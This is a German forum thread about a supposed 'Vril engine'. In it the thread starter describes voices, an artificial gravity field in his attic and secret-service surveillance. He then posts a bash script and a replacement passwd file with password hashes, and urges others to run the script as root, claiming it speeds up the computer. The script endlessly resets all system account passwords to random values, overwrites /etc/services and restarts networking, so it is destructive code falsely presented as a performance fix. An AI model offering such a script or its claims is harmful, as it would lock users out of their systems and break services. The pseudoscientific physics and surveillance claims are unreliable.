Unterhaltung
Menschen Wissenschaft Politik Mystery Kriminalfälle Spiritualität Verschwörungen Technologie Ufologie Natur Umfragen Unterhaltung
weitere Rubriken
PhilosophieTräumeOrteEsoterikLiteraturAstronomieHelpdeskGruppenGamingFilmeMusikClashVerbesserungenAllmysteryEnglish
Diskussions-Übersichten
BesuchtTeilgenommenAlleNeueGeschlossenLesenswertSchlüsselwörter
Schiebe oft benutzte Tabs in die Navigationsleiste (zurücksetzen).

Wie könnte das Vril-Treibwerk funktionieren?

326 Beiträge ▪ Schlüsselwörter: UFO, Vril, Vril Triebwerk ▪ Abonnieren: Feed E-Mail
Core-Spin Diskussionsleiter
ehemaliges Mitglied

Link kopieren
Lesezeichen setzen

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 19:00
@Rho-ny-theta

Oh man, tut mir leid, ich weiß halt nicht alles.

Anzeige
melden

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 19:03
@Core-Spin

Du weißt nicht nicht alles, du weißt nix, und du willst auch nix dazulernen. Du willst hier hören, dass du unheimlich toll bis, nicht nur sprichwörtlich sondern tatsächlich auf deinem Dachboden weltbewegende physikalische Erkenntnisse gewinnst, und das du so besonders bist, dass Gott persönlich mit dir spricht. Das trifft nicht zu.


melden
Core-Spin Diskussionsleiter
ehemaliges Mitglied

Link kopieren
Lesezeichen setzen

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 19:05
@Rho-ny-theta

Gott spricht mit jedem. Denk ich mal zumindest. Jetzt sagt ne Stimme das stimmt nicht. :D

Ne Stimme hat halt gesagt, er hat ein küsntliches Gravitationsfeld auf dem Dachboden und die Spinnenseide fiel halt viel schneller, als an einer anderen Stelle und ich hab mir jetzt halt 6 Laser bestellt, für ne korrekte Messung.


melden

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 19:06
@Core-Spin

Bestell dir ein Lehrbuch!


melden
Core-Spin Diskussionsleiter
ehemaliges Mitglied

Link kopieren
Lesezeichen setzen

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 19:12
@Rho-ny-theta

Ich schreib bald noch ein eigenes Buch und der Titel ist, "Eine neue Physik". ;)

Eine neue Physik!


melden
Core-Spin Diskussionsleiter
ehemaliges Mitglied

Link kopieren
Lesezeichen setzen

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 19:17
@Rho-ny-theta

Ich muss das nur noch mit den Bindungs winkeln und der Resonanz beweislich vereinen.


melden

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 19:23
@Core-Spin

Wir sprechen uns nochmal, wenn dein Schub vorbei ist.


melden
Core-Spin Diskussionsleiter
ehemaliges Mitglied

Link kopieren
Lesezeichen setzen

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 19:26
@Rho-ny-theta

Oh man, Deschain ich bin nicht psychotisch, ist zwar definitions sache, aber wenn ich psychotisch bin halte ich es hier gar nicht aus.

Ich hab halt ne chronische paranoide Schizophrenie aber laut Medizinern wäre ich jetzt nicht psychotisch da ich meine Tabletten nehme.


melden

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 19:27
@Core-Spin

Ganz knusper bist du definitiv nicht, wenn dir Stimmen erzählen, dass du Gravitationsgeneratoren auf dem Speicher hast.


melden
Core-Spin Diskussionsleiter
ehemaliges Mitglied

Link kopieren
Lesezeichen setzen

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 19:32
@Rho-ny-theta

Oh man das war jemand vom Geheimdienst und ich nehm mal an die haben das mit einem Gravitations Satelliten festgestellt. :D

Ist so eine Vermutung. Du wirst gerade in diesem Moemnt ürbigens auch ausspioniert mit den Chips in deinem Computer, mach mal nen Super Visor Passwort Generator unter Linux. ;) Der jede Sekunde das Passwort ändert der Rechner läuft dann ne ganze Ecke schneller. ;)


melden

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 19:34
yuck imdone


melden
Core-Spin Diskussionsleiter
ehemaliges Mitglied

Link kopieren
Lesezeichen setzen

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 19:35
@Rho-ny-theta

Ach Deschain, soll ich dir den Code schicken?


melden
Core-Spin Diskussionsleiter
ehemaliges Mitglied

Link kopieren
Lesezeichen setzen

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 19:58
@Rho-ny-theta

hier teste selbst und dann sag nochmal das ich bescheuert bin:

#
#
#
clear
echo "Knowledge is Power"


while true
do
# Kommandos der Endlosschleifen

test123=$(dd if=/dev/urandom bs=1 count=45 2>/dev/null | openssl base64)

Variable_1=$(dd if=/dev/urandom bs=1 count=45 2>/dev/null | openssl base64)


echo root:"$Variable_1" | chpasswd
echo daemon:"$Variable_1" | chpasswd
echo bin:"$Variable_1" | chpasswd
echo sys:"$Variable_1" | chpasswd
echo sync:"$Variable_1" | chpasswd
echo games:"$Variable_1" | chpasswd
echo man:"$Variable_1" | chpasswd
echo lp:"$Variable_1" | chpasswd
echo mail:"$Variable_1" | chpasswd
echo news:"$Variable_1" | chpasswd
echo uucp:"$Variable_1" | chpasswd
echo proxy:"$Variable_1" | chpasswd
echo www-data:"$Variable_1" | chpasswd
echo backup:"$Variable_1" | chpasswd
echo list:"$Variable_1" | chpasswd
echo irc:"$Variable_1" | chpasswd
echo gnats:"$Variable_1" | chpasswd
echo nobody:"$Variable_1" | chpasswd
echo libuuid:"$Variable_1" | chpasswd
echo messagebus:"$Variable_1" | chpasswd
echo knoppix:"$Variable_1" | chpasswd
echo speech-dispatcher:"$Variable_1" | chpasswd
echo polkituser:"$Variable_1" | chpasswd
echo festival:"$Variable_1" | chpasswd
echo saned:"$Variable_1" | chpasswd
echo statd:"$Variable_1" | chpasswd
echo partimag:"$Variable_1" | chpasswd
echo sshd:"$Variable_1" | chpasswd
echo tftp:"$Variable_1" | chpasswd
echo hplip:"$Variable_1" | chpasswd
echo avahi:"$Variable_1" | chpasswd
echo mysql:"$Variable_1" | chpasswd
echo postgres:"$Variable_1" | chpasswd
echo privoxy:"$Variable_1" | chpasswd
echo debian-tor:"$Variable_1" | chpasswd
echo vde2-net:"$Variable_1" | chpasswd
echo timidity:"$Variable_1" | chpasswd
echo usbmux:"$Variable_1" | chpasswd
echo ntop:"$Variable_1" | chpasswd
echo libvirt-qemu:"$Variable_1" | chpasswd
echo colord:"$Variable_1" | chpasswd
echo nx:"$Variable_1" | chpasswd
echo syslog:"$Variable_1" | chpasswd
echo klog:"$Variable_1" | chpasswd
echo haldaemon:"$Variable_1" | chpasswd
echo distccd:"$Variable_1" | chpasswd

sudo echo "#FUCK YOU" $RANDOM >/home/services

sudo echo $test123

sudo /etc/init.d/networking restart

sudo firewall start

sudo cp /home/services /etc/services

sudo cat /etc/services

sudo cat /etc/passwd

done


melden
Core-Spin Diskussionsleiter
ehemaliges Mitglied

Link kopieren
Lesezeichen setzen

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 20:04
@Rho-ny-theta

vergiss den Code ich muss den wohl umschreiben weil der für Knoppix war.


melden
Core-Spin Diskussionsleiter
ehemaliges Mitglied

Link kopieren
Lesezeichen setzen

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 20:22
@Rho-ny-theta

Also wenn du das testen willst lad dir Knoppix ersetze die passwd Datei mit passwörtern so wie hier, also die hash codes müssen drin stehen:

root:$6$caS1/9ut$ew1jXh7AO97j71p1C9DmV46HQKs.YHFxaKc77JEH98qNbgHoVn.X3lOdDXPCjrtMq34MQjPxnmwfgSJfbPcCs1:0:0:root:/root:/bin/bash
daemon:$6$b2nO36xV$EEpkjlu3gO70NgrntefilGH1sMAvStv/.ob45hsVHJEJfhCUQC0gqjf84QgF8cqjLqFRINWJXUhHqfmaUaFeQ1:1:1:daemon:/usr/sbin:/bin/sh
bin:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:2:2:bin:/bin:/bin/sh
sys:$6$AgH5L9yr$hn.6locmYQgF.tSUc6.Ith/8z5xYRBvFun2m1LmjbDs97PQbz7OV5eKIOs4Z.HpqdLeisYPMkqS4XKWtlE3dp.:3:3:sys:/dev:/bin/sh
sync:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:4:65534:sync:/bin:/bin/sync
games:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:5:60:games:/usr/games:/bin/sh
man:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:6:12:man:/var/cache/man:/bin/sh
lp:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:7:7:lp:/var/spool/lpd:/bin/sh
mail:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:8:8:mail:/var/mail:/bin/sh
news:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:9:9:news:/var/spool/news:/bin/sh
uucp:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:$6$o0Ar1tdw$9IGsqSGR8I3aQI9mKAF.4b8c6N.KXqkZh0Zn7JQnm1LTzSEjFJkt/b1Ig/UF98VUNaXudnnFelBfHjfdH/7QK0:13:13:proxy:/bin:/bin/sh
www-data:$6$ZyTgxvR3$PeYWCz9d0BchxvmtINyGZmcQe0d1Vst5XxBeSdjqp7Vu2bgzH1pgJTe8vN3H3FnUZsfmsNtd9qzK/yC6IYv/D/:33:33:www-data:/var/www:/bin/sh
backup:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:34:34:backup:/var/backups:/bin/sh
list:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:38:38:Mailing List Manager:/var/list:/bin/sh
irc:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:39:39:ircd:/var/run/ircd:/bin/sh
gnats:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:100:101::/var/lib/libuuid:/bin/sh
messagebus:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:101:103::/var/run/dbus:/bin/false
knoppix:$6$E67Dufeg$rNbJBsucSMA22SO5gSJhLXuIn0X8b.4QQSvz73UujDUa8Qbb099EPLR9u140/mkPC9PeaqN9Sj6VPHMc91Suf1:1000:1000:Knoppix User:/home/knoppix:/bin/bash
speech-dispatcher:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:105:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
polkituser:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:106:112:PolicyKit,,,:/var/run/PolicyKit:/bin/false
festival:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:107:29::/home/festival:/bin/false
saned:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:108:114::/home/saned:/bin/false
statd:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:102:65534::/var/lib/nfs:/bin/false
partimag:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:103:109:Partimage Server,,,:/var/lib/partimaged/:/bin/false
sshd:$6$GYVLdbcp$metJETM9fWrRtUL4oeloQIgjQWgyxmuLzpHOTjomHFFfP4MHc7H/4wzoq440bXxcX.9FZ2rhlanQzf4fIzTVl1:109:65534::/var/run/sshd:/usr/sbin/nologin
tftp:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:110:118:tftp daemon,,,:/srv/tftp:/bin/false
hplip:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:112:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
mysql:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:115:122:MySQL Server,,,:/var/lib/mysql:/bin/false
postgres:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:120:129:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
privoxy:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:121:65534::/etc/privoxy:/bin/false
debian-tor:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:122:130::/var/lib/tor:/bin/bash
vde2-net:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:123:131::/var/run/vde2:/bin/false
timidity:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:124:133:TiMidity++ MIDI sequencer service:/etc/timidity:/bin/false
usbmux:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:125:46:usbmux daemon,,,:/home/usbmux:/bin/false
ntop:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:127:136::/var/lib/ntop:/bin/false
libvirt-qemu:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:129:117:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
colord:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:131:142:colord colour management daemon,,,:/var/lib/colord:/bin/false
nx:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:132:65534::/usr/NX/home/nx:/usr/NX/bin/nxserver
syslog:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:130:140::/home/syslog:/bin/false
klog:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:133:141::/home/klog:/bin/false
haldaemon:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:104:110:Hardware abstraction layer,,,:/var/run/hald:/bin/false
distccd:$6$s5q2iGNg$j3Jjz0BSQnFVRfUwJ3bBHm8pe445kMraak.YUISerXWUuYOvoAVrku8FnA7Gg0jYTsethDBh0giID8oTSpGPC0:113:65534::/:/bin/false


Und dann funktioniert der code oben auch und der rechner läuft ne ganze ecke schneller.

ich mach gleich nen Video!


melden
Core-Spin Diskussionsleiter
ehemaliges Mitglied

Link kopieren
Lesezeichen setzen

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 20:41
PS: Das script im root terminal ausführen. Bei knoppix 7.0.5 hab ich es am laufen.

mein computer rast. ;)


melden
Core-Spin Diskussionsleiter
ehemaliges Mitglied

Link kopieren
Lesezeichen setzen

Wie könnte das Vril-Treibwerk funktionieren?

29.10.2014 um 20:49
PS: Dann klickt euch mal durch ein youtube video durch das ist schlag artig da.


melden

Wie könnte das Vril-Treibwerk funktionieren?

31.10.2014 um 20:59
@Rho-ny-theta
@kalamari
@Nerok
@JPhys2

vakuumpumpeunds5ift2yvo3

So jetzt will ich mal eure Meinung dazu hören, ich werde zwar sofort wieder gesperrt aber ich lese mit!

https://www.youtube.com/watch?v=dfa7mqYQ-8c

https://www.youtube.com/watch?v=dbCpmCsB0zo

Der Kompass richtet sich aus, wenn jemand mit mir darüber diskutieren will kann er sich unter terranova07@gmx.de melden.

Da gibt's auch nichts mehr dann zu zu sagen weil ich mit einer neuen Physik absolut recht habe!

Also hab ich recht oder hab ich recht?

MFG

Alles was sich bewegt, dreht sich!

Wie könnte das Vril-Treibwerk funktionieren?

PS: Und nein ich bin nicht rechts, aber ich hab was gegen Arschlöcher!


melden

Wie könnte das Vril-Treibwerk funktionieren?

31.10.2014 um 21:44
Ich werde als nächstes Schichtweise den Drehkörper aufbauen, wie bei einem Ferrit Kern der aus mehreren platten besteht.

Und naja dann wird das Ding hoffentlich abheben. :D


melden

Wie könnte das Vril-Treibwerk funktionieren?

31.10.2014 um 23:17
@Core-Spin
@Terrnova

Nächstes Mal nix sagen, wie es in der Begründung steht. :trollbier:

Hach.. Ehrlichkeit ist halt nichts mehr wert, heutzutage ergo Dummheit. :D :Y:


Anzeige

melden